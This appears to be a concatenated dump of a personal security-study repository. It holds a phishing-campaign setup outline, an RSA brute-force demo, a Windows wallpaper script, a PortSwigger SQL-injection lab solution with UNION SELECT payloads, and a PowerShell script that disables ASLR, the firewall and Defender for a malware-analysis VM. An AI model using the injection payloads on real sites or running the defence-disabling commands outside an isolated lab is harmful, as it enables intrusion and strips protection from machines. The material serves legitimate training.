31 | 32 | ### Creating Email Templates 33 | 34 | ### Creating Landing Pages 35 | 36 | ### Creating Sending Profiles 37 | 38 | #### Sending Test Email 39 | 40 | Before saving the profile, send a test email to your own test account to make sure you are successfully able to send emails. 41 | 42 | ### Creating Campaign 43 | -------------------------------------------------------------------------------- /Cryptography/AsymmetricEncryption/brute_force_rsa.py: -------------------------------------------------------------------------------- 1 | from rsa import RSA 2 | from time import perf_counter 3 | from gmpy2 import powmod 4 | from itertools import product 5 | from string import ascii_letters 6 | 7 | def bytes_to_int(b): 8 | return int.from_bytes(b, byteorder="big") 9 | 10 | def rsa_encrypt(m, public_key): 11 | nums = public_key.public_numbers() 12 | return powmod(m, nums.e, nums.n) 13 | 14 | def brute_force(target, public_key, word_len): 15 | start = perf_counter() 16 | for word in product(ascii_letters, repeat=word_len): 17 | word = ''.join(word) 18 | word_as_int = bytes_to_int(bytes(word, "utf-8")) 19 | encrypted_word = rsa_encrypt(word_as_int, public_key) 20 | if encrypted_word == target: 21 | end = perf_counter() 22 | time_elapsed = end - start 23 | print(f"Found match: \"{word}\"") 24 | print(f"Time elapsed: {time_elapsed}") 25 | break 26 | 27 | if __name__ == "__main__": 28 | public_key = RSA ( 29 | public_exponent=65537, key_size=2048 30 | ).public_key 31 | 32 | word = b"pawn" 33 | word_as_int = bytes_to_int(word) 34 | encrypted_word = rsa_encrypt(word_as_int, public_key) 35 | brute_force(encrypted_word, public_key, len(word)) 36 | 37 | """ 38 | Found match: "pawn" 39 | Time elapsed: 58.58826439999757 40 | """ 41 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/CSharpAES.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\rodri\.nuget\packages\ 9 | PackageReference 10 | 5.7.0 11 | 12 | 13 | 14 | 15 | 16 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 17 | 18 | -------------------------------------------------------------------------------- /Misc/WindowsRegistry/change_wallpaper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from sys import argv 4 | from ctypes import ( 5 | windll, 6 | byref, 7 | c_long 8 | ) 9 | from winreg import ( 10 | HKEY_CURRENT_USER, 11 | ConnectRegistry, 12 | OpenKey, 13 | KEY_ALL_ACCESS, 14 | EnumValue, 15 | SetValueEx, 16 | QueryInfoKey, 17 | REG_SZ 18 | ) 19 | 20 | def change_wallpaper(image: str): 21 | with ConnectRegistry(None, HKEY_CURRENT_USER) as hkcu: 22 | with \ 23 | OpenKey(hkcu, r"Control Panel\Desktop", 0, KEY_ALL_ACCESS) \ 24 | as desktop_key: 25 | print(f"[+] Changing wallpaper to {image} ...") 26 | SetValueEx(desktop_key, "WallPaper", 0, REG_SZ, image) 27 | 28 | # the following lines of code is boiler plate code 29 | # for making telling Windows that registry settings have changed 30 | # and that it needs to refresh 31 | HWND_BROADCAST = 0xFFFF 32 | WM_SETTINGCHANGE = 0x1A 33 | SMTO_ABORTIFHUNG = 0x0002 34 | result = c_long() 35 | SendMessageTimeoutW = windll.user32.SendMessageTimeoutW 36 | SendMessageTimeoutW(HWND_BROADCAST, WM_SETTINGCHANGE, 0, u'Control Panel\\Desktop', SMTO_ABORTIFHUNG, 5000, byref(result),) 37 | 38 | if __name__ == "__main__": 39 | path_to_image: str = argv[1] 40 | change_wallpaper(path_to_image) 41 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/SQL_Injection/Lab4/README.md: -------------------------------------------------------------------------------- 1 | # Finding a Column Containing Text 2 | 3 | ### Objective 4 | 5 | - Determine the number of columns returned in the server's response 6 | - Determine which columns contains a string data type 7 | - Return an additional row containing a string provided in a `UNION SELECT` statement 8 | 9 | ### Solution 10 | 11 | To determine the number of columns returned in the response, make the following request to the server while incrementing the value of the `ORDER BY` clause until 12 | an internal server error is returned: 13 | 14 | ``` 15 | https://.web-security-academy.net/filter?category=Accessories' ORDER BY 1-- - 16 | ``` 17 | 18 | Using `ORDER BY 4-- -` returns the internal server error, so we know there are 4 columns being returned. Next, we can determine which column contains text data 19 | by using the following SQL payloads: 20 | 21 | ``` 22 | ' UNION SELECT 'a',NULL,NULL-- - 23 | ' UNION SELECT NULL,'a',NULL-- - 24 | ' UNION SELECT NULL,NULL,'a'-- - 25 | ``` 26 | 27 | An error will occur when the `'a'` has been specified in a column where text data is not compatible with the returned data type. The working payload is: 28 | 29 | ``` 30 | ' UNION SELECT NULL,'a',NULL-- - 31 | ``` 32 | 33 | Use the payload above to return the string specified in the labs home page, like this: 34 | 35 | ``` 36 | ' UNION SELECT NULL,'3HRR3g',NULL-- - 37 | ``` 38 | -------------------------------------------------------------------------------- /MalwareAnalysis/MalwareAnalysisVMSetup.ps1: -------------------------------------------------------------------------------- 1 | function Disable-ASLR { 2 | 3 | <# 4 | .SYNOPSIS 5 | Disables Address Space Layout Randomization 6 | 7 | .DESCRIPTION 8 | Disable-ASLR is a function that disables Address Space Layout Randomization by setting a value 1 9 | to the registry path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\MoveImages" 10 | 11 | #> 12 | New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" -Name MoveImages -Value 1 13 | } 14 | 15 | function Disable-WindowsFirewall { 16 | 17 | <# 18 | .SYNOPSIS 19 | Turns off Windows Firewall 20 | 21 | .DESCRIPTION 22 | Disable-WindowsFirewall disables the Windows firewall by using Set-NetFirewallProfile to set 23 | all the three different networks ``Enabled`` to False 24 | 25 | #> 26 | Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled False 27 | } 28 | 29 | 30 | function Disable-WindowsDefender { 31 | 32 | <# 33 | .SYNOPSIS 34 | Turns off Windows Defender real-time monitoring 35 | 36 | .DESCRIPTION 37 | Disable-WindowsDefender disables the Windows Antivirus real-time protection monitoring by using the cmdlet 38 | Set-MpPrefence to set the property DisableRealtimeMonitoring to true 39 | 40 | #> 41 | Set-MpPreference -DisableRealtimeMonitoring $true 42 | } 43 | 44 | Disable-ASLR 45 | Disable-WindowsFirewall 46 | Disable-WindowsDefender 47 | --------------------------------------------------------------------------------